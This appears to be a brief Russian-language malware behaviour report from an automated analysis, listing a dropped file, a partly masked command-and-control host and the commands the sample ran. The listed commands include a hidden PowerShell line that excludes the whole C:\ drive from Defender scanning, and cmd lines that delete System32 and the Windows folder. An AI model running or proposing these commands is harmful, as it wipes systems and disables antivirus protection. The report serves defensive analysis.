Техническая информация
- %TEMP%\inteldriver.exe
- <Полный путь к файлу>
- 'gm###l.zz.am':1002
- DNS ASK gm###l.zz.am
- '%TEMP%\inteldriver.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\' (со скрытым окном)
- '%TEMP%\inteldriver.exe' ' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /K del /q "%WINDIR% \System32\*" & exit' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /K rmdir "%WINDIR% \System32" & exit' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /K rmdir "%WINDIR% \" & exit' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-MpPreference -verbose
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\
- '<SYSTEM32>\cmd.exe' /K del /q "%WINDIR% \System32\*" & exit
- '<SYSTEM32>\cmd.exe' /K rmdir "%WINDIR% \System32" & exit
- '<SYSTEM32>\cmd.exe' /K rmdir "%WINDIR% \" & exit